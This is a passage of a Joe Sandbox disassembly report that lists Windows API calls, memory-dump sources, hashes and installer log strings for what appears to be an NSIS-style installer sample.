• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00070600,00000064,0014A47A), ref: 00403295
                                                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
APIs
• OleInitialize.OLE32(00000000), ref: 00405083
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
• OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
• CreateFontIndirectW.GDI32(00420110), ref: 0040216A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
APIs
  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
• lstrcmpW.KERNEL32(?,Version ), ref: 00407276
• lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
Strings
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
